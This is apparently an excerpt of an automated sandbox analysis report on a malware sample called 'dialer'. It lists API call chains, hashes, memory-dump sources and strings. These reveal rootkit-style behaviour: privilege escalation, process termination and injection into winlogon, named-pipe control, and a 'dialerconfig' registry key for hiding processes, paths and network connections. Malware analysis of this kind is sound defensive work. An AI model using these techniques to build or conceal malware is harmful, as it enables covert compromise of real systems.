                                                                                                                                          • Instruction ID: f8cd9da32bd5f05234f074562d0aa887b23da38695083ed414fb1e39bfafe15b
                                                                                                                                          • Opcode Fuzzy Hash: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                                                                                                          • Instruction Fuzzy Hash: B451C336B0868192EF349F15E54466A7361FF84B95F484132DE8E57B54EF3CE548C704
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Control-flow Graph

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000011.00000002.1796684320.00007FF65A131000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF65A130000, based on PE: true
                                                                                                                                          • Associated: 00000011.00000002.1796649714.00007FF65A130000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000011.00000002.1796749741.00007FF65A133000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000011.00000002.1796796645.00007FF65A136000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_17_2_7ff65a130000_dialer.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                                                                                                          • String ID: M$\\.\pipe\dialerchildproc64
                                                                                                                                          • API String ID: 2203880229-3489460547
                                                                                                                                          • Opcode ID: cb78decc689e444f168c8ecd1fa7ab696948f8a3ff5b9be1a13ae3c23ba91d6c
                                                                                                                                          • Instruction ID: 447e374bf33203f5281a7212a16cf8832de539076e66116ba4f85b83ac7b5dc8
                                                                                                                                          • Opcode Fuzzy Hash: cb78decc689e444f168c8ecd1fa7ab696948f8a3ff5b9be1a13ae3c23ba91d6c
                                                                                                                                          • Instruction Fuzzy Hash: 29117021A0C64292EF24EF25E8043796760AF957E1F084276D6DE966D4CF7CE408C704
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Control-flow Graph

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000011.00000002.1796684320.00007FF65A131000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF65A130000, based on PE: true
                                                                                                                                          • Associated: 00000011.00000002.1796649714.00007FF65A130000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000011.00000002.1796749741.00007FF65A133000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000011.00000002.1796796645.00007FF65A136000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_17_2_7ff65a130000_dialer.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                                                                                                                          • String ID: \\.\pipe\dialercontrol_redirect64
                                                                                                                                          • API String ID: 2071455217-3440882674
                                                                                                                                          • Opcode ID: 0eadeefac485689016ee7cb8901f6413b977b23d4cbf2cacf1e5db6f82192be8
                                                                                                                                          • Instruction ID: b60da6f928a2f9ea42751551bd2827a42f3973b35534fdf994f56ead77422801
                                                                                                                                          • Opcode Fuzzy Hash: 0eadeefac485689016ee7cb8901f6413b977b23d4cbf2cacf1e5db6f82192be8
                                                                                                                                          • Instruction Fuzzy Hash: DB017921A0C54291EE34AF15E8042757374AF61BA1F1C8276DBAEA65E4DF7CE448C704
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Control-flow Graph

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000011.00000002.1796684320.00007FF65A131000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF65A130000, based on PE: true
                                                                                                                                          • Associated: 00000011.00000002.1796649714.00007FF65A130000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000011.00000002.1796749741.00007FF65A133000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000011.00000002.1796796645.00007FF65A136000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_17_2_7ff65a130000_dialer.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3676546796-0
                                                                                                                                          • Opcode ID: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                                                                                                          • Instruction ID: 413531b650a79ca1bf75a05039c52b97eb5dc5d7bd2ba00861542d1d8aab0c81
                                                                                                                                          • Opcode Fuzzy Hash: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                                                                                                          • Instruction Fuzzy Hash: 5911A232B086528AEB38DF16E85443A7661FFD4F81F184079DA8A5BB58CF3DE845CB40
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Control-flow Graph

                                                                                                                                          APIs
                                                                                                                                          • GetProcessHeap.KERNEL32(?,00000000,?,00007FF65A13238B,?,?,?,?,?,?,?,?,?,?,?,00007FF65A132261), ref: 00007FF65A131801
                                                                                                                                          • RtlAllocateHeap.NTDLL(?,00000000,?,00007FF65A13238B,?,?,?,?,?,?,?,?,?,?,?,00007FF65A132261), ref: 00007FF65A131812
                                                                                                                                            • Part of subcall function 00007FF65A1314D8: GetProcessHeap.KERNEL32 ref: 00007FF65A13150B
                                                                                                                                            • Part of subcall function 00007FF65A1314D8: HeapAlloc.KERNEL32 ref: 00007FF65A13151E
                                                                                                                                            • Part of subcall function 00007FF65A1314D8: GetProcessHeap.KERNEL32 ref: 00007FF65A13152C
                                                                                                                                            • Part of subcall function 00007FF65A1314D8: HeapAlloc.KERNEL32 ref: 00007FF65A13153D
                                                                                                                                            • Part of subcall function 00007FF65A1314D8: K32EnumProcesses.KERNEL32 ref: 00007FF65A131557
                                                                                                                                            • Part of subcall function 00007FF65A1314D8: OpenProcess.KERNEL32 ref: 00007FF65A131585
                                                                                                                                            • Part of subcall function 00007FF65A1314D8: K32EnumProcessModules.KERNEL32 ref: 00007FF65A1315AA
                                                                                                                                            • Part of subcall function 00007FF65A1314D8: ReadProcessMemory.KERNELBASE ref: 00007FF65A1315E1
                                                                                                                                            • Part of subcall function 00007FF65A1314D8: FindCloseChangeNotification.KERNELBASE ref: 00007FF65A13161D
                                                                                                                                            • Part of subcall function 00007FF65A1314D8: GetProcessHeap.KERNEL32 ref: 00007FF65A13162F
                                                                                                                                            • Part of subcall function 00007FF65A1314D8: HeapFree.KERNEL32 ref: 00007FF65A13163D
                                                                                                                                            • Part of subcall function 00007FF65A1314D8: GetProcessHeap.KERNEL32 ref: 00007FF65A131643
                                                                                                                                            • Part of subcall function 00007FF65A1314D8: HeapFree.KERNEL32 ref: 00007FF65A131651
                                                                                                                                          • OpenProcess.KERNEL32 ref: 00007FF65A131859
                                                                                                                                          • TerminateProcess.KERNEL32 ref: 00007FF65A13186C
                                                                                                                                          • CloseHandle.KERNEL32 ref: 00007FF65A131875
                                                                                                                                          • GetProcessHeap.KERNEL32 ref: 00007FF65A131885
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000011.00000002.1796684320.00007FF65A131000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF65A130000, based on PE: true
                                                                                                                                          • Associated: 00000011.00000002.1796649714.00007FF65A130000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000011.00000002.1796749741.00007FF65A133000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000011.00000002.1796796645.00007FF65A136000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_17_2_7ff65a130000_dialer.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: HeapProcess$AllocCloseEnumFreeOpen$AllocateChangeFindHandleMemoryModulesNotificationProcessesReadTerminate
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3947494490-0
                                                                                                                                          • Opcode ID: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                                                                                                          • Instruction ID: a91f9f5c5581a15ea8aadd44addc0dbaab50f5b7045d410087c7cd8c74499115
                                                                                                                                          • Opcode Fuzzy Hash: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                                                                                                          • Instruction Fuzzy Hash: E8116621F0965285FF289F1BE844079A7A1EF89B85F0C8076DE8DA3765DE7CD4458704
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Control-flow Graph

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000011.00000002.1796684320.00007FF65A131000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF65A130000, based on PE: true
                                                                                                                                          • Associated: 00000011.00000002.1796649714.00007FF65A130000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000011.00000002.1796749741.00007FF65A133000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000011.00000002.1796796645.00007FF65A136000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_17_2_7ff65a130000_dialer.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Process$ChangeCloseFindNotificationOpenWow64
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3805842350-0
                                                                                                                                          • Opcode ID: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                                                                                                          • Instruction ID: 39f52291810d9891cec9aabda7e6a15e50b9da23fb78d7ee0040c2dbe231c701
                                                                                                                                          • Opcode Fuzzy Hash: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                                                                                                          • Instruction Fuzzy Hash: 83F01D21B0978292EF648F16B584129A6A1EF88BC1F48907AEB8D93758DF7DD4858704
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Control-flow Graph

                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 00007FF65A13226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF65A132261), ref: 00007FF65A13228F
                                                                                                                                            • Part of subcall function 00007FF65A13226C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF65A132261), ref: 00007FF65A13229F
                                                                                                                                            • Part of subcall function 00007FF65A13226C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00007FF65A132261), ref: 00007FF65A1322B9
                                                                                                                                            • Part of subcall function 00007FF65A13226C: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF65A1322D0
                                                                                                                                            • Part of subcall function 00007FF65A13226C: AdjustTokenPrivileges.KERNELBASE ref: 00007FF65A132308
                                                                                                                                            • Part of subcall function 00007FF65A13226C: GetLastError.KERNEL32 ref: 00007FF65A132312
                                                                                                                                            • Part of subcall function 00007FF65A13226C: FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,00007FF65A132261), ref: 00007FF65A13231B
                                                                                                                                            • Part of subcall function 00007FF65A13226C: FindResourceA.KERNEL32 ref: 00007FF65A13232F
                                                                                                                                            • Part of subcall function 00007FF65A13226C: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF65A132261), ref: 00007FF65A132346
                                                                                                                                            • Part of subcall function 00007FF65A13226C: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF65A132261), ref: 00007FF65A13235F
                                                                                                                                            • Part of subcall function 00007FF65A13226C: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF65A132261), ref: 00007FF65A132371
                                                                                                                                            • Part of subcall function 00007FF65A13226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF65A132261), ref: 00007FF65A13237E
                                                                                                                                            • Part of subcall function 00007FF65A13226C: RegCreateKeyExW.KERNELBASE ref: 00007FF65A1323BE
                                                                                                                                            • Part of subcall function 00007FF65A13226C: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00007FF65A1323E5
                                                                                                                                            • Part of subcall function 00007FF65A13226C: RegSetKeySecurity.KERNELBASE ref: 00007FF65A1323FE
                                                                                                                                            • Part of subcall function 00007FF65A13226C: LocalFree.KERNEL32 ref: 00007FF65A132408
                                                                                                                                          • ExitProcess.KERNEL32 ref: 00007FF65A132263
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000011.00000002.1796684320.00007FF65A131000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF65A130000, based on PE: true
                                                                                                                                          • Associated: 00000011.00000002.1796649714.00007FF65A130000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000011.00000002.1796749741.00007FF65A133000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000011.00000002.1796796645.00007FF65A136000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_17_2_7ff65a130000_dialer.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Process$Resource$Security$CurrentDescriptorFindOpenToken$AdjustChangeCloseConvertCreateErrorExitFreeLastLoadLocalLockLookupNotificationPrivilegePrivilegesSizeofStringValue
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2373407002-0
                                                                                                                                          • Opcode ID: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                                                                                                          • Instruction ID: 19fb4629c89324b12cb95f9c2c49c3b2406850aea5ffa1e58bf05f9d7fd97e12
                                                                                                                                          • Opcode Fuzzy Hash: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                                                                                                          • Instruction Fuzzy Hash: C0A02200F0E00282FE383FF80C0E03C20A02FA0B02F0800B2C08AEA282CC3C20028308
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 184 7ff65a132560-7ff65a13258c 185 7ff65a13273a-7ff65a132742 184->185 186 7ff65a132592 184->186 189 7ff65a132748-7ff65a13274b 185->189 190 7ff65a13297e-7ff65a1329a2 ReadFile 185->190 187 7ff65a132598-7ff65a13259f 186->187 188 7ff65a1326c6-7ff65a1326fe GetProcessHeap HeapAlloc K32EnumProcesses 186->188 193 7ff65a1326bd-7ff65a1326bf ExitProcess 187->193 194 7ff65a1325a5-7ff65a1325a8 187->194 191 7ff65a132a74-7ff65a132a8e 188->191 192 7ff65a132704-7ff65a132715 188->192 195 7ff65a132751-7ff65a132756 189->195 196 7ff65a132974-7ff65a132979 call 7ff65a13175c 189->196 190->191 197 7ff65a1329a8-7ff65a1329af 190->197 192->191 198 7ff65a13271b-7ff65a132733 call 7ff65a1310c0 192->198 199 7ff65a132660-7ff65a13268b RegOpenKeyExW 194->199 200 7ff65a1325ae-7ff65a1325b1 194->200 201 7ff65a132919-7ff65a13292c call 7ff65a131944 195->201 202 7ff65a13275c-7ff65a13275f 195->202 196->191 197->191 204 7ff65a1329b5-7ff65a1329c9 call 7ff65a1318ac 197->204 225 7ff65a132735 198->225 207 7ff65a13268d-7ff65a13269b RegDeleteValueW 199->207 208 7ff65a1326a1-7ff65a1326b8 call 7ff65a1319c4 call 7ff65a13175c call 7ff65a131000 call 7ff65a1317ec 199->208 209 7ff65a1325b7-7ff65a1325ba 200->209 210 7ff65a132651-7ff65a13265b 200->210 201->191 224 7ff65a132932-7ff65a132941 call 7ff65a131944 201->224 211 7ff65a13279d-7ff65a1327ae call 7ff65a131944 202->211 212 7ff65a132761-7ff65a132766 202->212 204->191 229 7ff65a1329cf-7ff65a1329d5 204->229 207->208 208->191 219 7ff65a1325c0-7ff65a1325c5 209->219 220 7ff65a132644-7ff65a13264c 209->220 210->191 211->191 232 7ff65a1327b4-7ff65a1327d6 ReadFile 211->232 212->191 221 7ff65a13276c-7ff65a132796 call 7ff65a13217c call 7ff65a1321a8 ExitProcess 212->221 219->191 227 7ff65a1325cb-7ff65a1325ef ReadFile 219->227 220->191 224->191 246 7ff65a132947-7ff65a13296f ShellExecuteW 224->246 225->191 227->191 235 7ff65a1325f5-7ff65a1325fc 227->235 230 7ff65a1329db-7ff65a132a16 GetProcessHeap HeapAlloc call 7ff65a1314d8 229->230 231 7ff65a132a5f 229->231 251 7ff65a132a18-7ff65a132a1e 230->251 252 7ff65a132a49-7ff65a132a4f GetProcessHeap 230->252 242 7ff65a132a66-7ff65a132a6f call 7ff65a132a90 231->242 232->191 238 7ff65a1327dc-7ff65a1327e3 232->238 235->191 241 7ff65a132602-7ff65a132616 call 7ff65a1318ac 235->241 238->191 245 7ff65a1327e9-7ff65a132827 GetProcessHeap HeapAlloc ReadFile 238->245 241->191 261 7ff65a13261c-7ff65a132622 241->261 242->191 253 7ff65a13282d-7ff65a132839 245->253 254 7ff65a13290b-7ff65a132914 GetProcessHeap 245->254 246->191 251->252 258 7ff65a132a20-7ff65a132a32 251->258 257 7ff65a132a52-7ff65a132a5d HeapFree 252->257 253->254 259 7ff65a13283f-7ff65a13284b 253->259 254->257 257->191 262 7ff65a132a38-7ff65a132a40 258->262 263 7ff65a132a34-7ff65a132a36 258->263 259->254 264 7ff65a132851-7ff65a13285c 259->264 266 7ff65a132638-7ff65a13263f 261->266 267 7ff65a132624-7ff65a132633 call 7ff65a1310c0 261->267 262->252 269 7ff65a132a42 262->269 263->262 268 7ff65a132a44 call 7ff65a1316cc 263->268 270 7ff65a132881-7ff65a132905 lstrlenW GetProcessHeap HeapAlloc call 7ff65a132a90 GetProcessHeap HeapFree 264->270 271 7ff65a13285e-7ff65a132869 264->271 266->242 267->191 268->252 269->258 270->254 271->254 274 7ff65a13286f-7ff65a13287c call 7ff65a131c88 271->274 274->254
                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000011.00000002.1796684320.00007FF65A131000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF65A130000, based on PE: true
                                                                                                                                          • Associated: 00000011.00000002.1796649714.00007FF65A130000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000011.00000002.1796749741.00007FF65A133000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000011.00000002.1796796645.00007FF65A136000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_17_2_7ff65a130000_dialer.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Process$Open$File$CloseExitFindHeapName$AllocChangeDeleteEnumHandleInformationModuleNotificationPathProcessesQueryReadTokenValueWow64lstrlen
                                                                                                                                          • String ID: SOFTWARE$dialerstager$open
                                                                                                                                          • API String ID: 4281403370-3931493855
                                                                                                                                          • Opcode ID: 3c799c4d4b717077f969037001029e391788172767dfb7e3a3364a0c1608c947
                                                                                                                                          • Instruction ID: ee5751e449e949ef954e9388f5643c784d9faea982b98059776b92cbbda03e77
                                                                                                                                          • Opcode Fuzzy Hash: 3c799c4d4b717077f969037001029e391788172767dfb7e3a3364a0c1608c947
                                                                                                                                          • Instruction Fuzzy Hash: 0BD18721A085838BEF79AF2998042B93255FF54744F4C4177DACEABA94DF7CE604C744
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Control-flow Graph

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000011.00000002.1796684320.00007FF65A131000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF65A130000, based on PE: true
                                                                                                                                          • Associated: 00000011.00000002.1796649714.00007FF65A130000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000011.00000002.1796749741.00007FF65A133000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000011.00000002.1796796645.00007FF65A136000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_17_2_7ff65a130000_dialer.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateOpenResumeTerminate
                                                                                                                                          • String ID: @
                                                                                                                                          • API String ID: 3462610200-2766056989
                                                                                                                                          • Opcode ID: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                                                                                                          • Instruction ID: 4e59e8d8f5326803537ecac9416ae43a3d7f7d4685ab73a0218b25ebf26b4ea2
                                                                                                                                          • Opcode Fuzzy Hash: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                                                                                                          • Instruction Fuzzy Hash: 05519B32B04A4186EF61CF66E8406AA7BE5FF48B88F094176CE8DA7758DF39E445C704
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Control-flow Graph

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000011.00000002.1796684320.00007FF65A131000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF65A130000, based on PE: true
                                                                                                                                          • Associated: 00000011.00000002.1796649714.00007FF65A130000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000011.00000002.1796749741.00007FF65A133000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000011.00000002.1796796645.00007FF65A136000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_17_2_7ff65a130000_dialer.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                                                                                                          • String ID: dialersvc64
                                                                                                                                          • API String ID: 4184240511-3881820561
                                                                                                                                          • Opcode ID: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                                                                                                          • Instruction ID: 0fd03e714dc6d3f763d2ba92b44ea0c109d8a4664c022c3e9ba76a52764a67b4
                                                                                                                                          • Opcode Fuzzy Hash: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                                                                                                          • Instruction Fuzzy Hash: 37416332708A8296EB20CF69E4442AD73B5FF85B99F089176EE8D97A54DF3CE145C304
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000011.00000002.1796684320.00007FF65A131000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF65A130000, based on PE: true
                                                                                                                                          • Associated: 00000011.00000002.1796649714.00007FF65A130000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000011.00000002.1796749741.00007FF65A133000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000011.00000002.1796796645.00007FF65A136000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_17_2_7ff65a130000_dialer.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Delete$CloseEnumOpen
                                                                                                                                          • String ID: SOFTWARE\dialerconfig
                                                                                                                                          • API String ID: 3013565938-461861421
                                                                                                                                          • Opcode ID: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                                                                                                          • Instruction ID: 59817108e9c8c297ff7625c0d2203548c67d4b1c4bce412bffabd7c303b3d771
                                                                                                                                          • Opcode Fuzzy Hash: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                                                                                                          • Instruction Fuzzy Hash: 6A11CA36B18A8581EF708F24E8457F92364FF44754F444276D69D569D8DF3CD248CB08
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000011.00000002.1796684320.00007FF65A131000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF65A130000, based on PE: true
                                                                                                                                          • Associated: 00000011.00000002.1796649714.00007FF65A130000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000011.00000002.1796749741.00007FF65A133000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000011.00000002.1796796645.00007FF65A136000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_17_2_7ff65a130000_dialer.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: File$Write$CloseCreateHandle
                                                                                                                                          • String ID: \\.\pipe\dialercontrol_redirect64
                                                                                                                                          • API String ID: 148219782-3440882674
                                                                                                                                          • Opcode ID: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                                                                                                          • Instruction ID: 7a33322279e97794134140e4f50075b821a72643ec45bb6dff8710541c8f83e9
                                                                                                                                          • Opcode Fuzzy Hash: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                                                                                                          • Instruction Fuzzy Hash: 0611AC36B24B5182EB208F05E908329A760FB88FA0F584236DAA957B98CF7CD509C744
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000011.00000002.1796684320.00007FF65A131000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF65A130000, based on PE: true
                                                                                                                                          • Associated: 00000011.00000002.1796649714.00007FF65A130000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000011.00000002.1796749741.00007FF65A133000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000011.00000002.1796796645.00007FF65A136000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_17_2_7ff65a130000_dialer.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                          • String ID: ntdll.dll
                                                                                                                                          • API String ID: 1646373207-2227199552
                                                                                                                                          • Opcode ID: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                                                                                                          • Instruction ID: 23daddaa9d40103eff251a7bedf7b140a4808238d2d9615461c0489ff87134be
                                                                                                                                          • Opcode Fuzzy Hash: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                                                                                                          • Instruction Fuzzy Hash: 15D0C994B1660792EE299F6A686403453916F58B85F8C54B2CE9EE6350DE3CD0998708
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Control-flow Graph

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000016.00000002.2891622087.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_22_2_225dc640000_winlogon.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                                                                          • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                                                                          • API String ID: 106492572-2879589442
                                                                                                                                          • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                                                                          • Instruction ID: 406a7c028b3c229bdc1c75f8301e19e1701b13e4dfdd540bc7c265abecc9bc67
                                                                                                                                          • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                                                                          • Instruction Fuzzy Hash: 47712D7E328E60A6EB109FA9E85869D33B4F784F9AF509111DE4E47B69EF34C444C740
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Control-flow Graph

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000016.00000002.2891622087.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
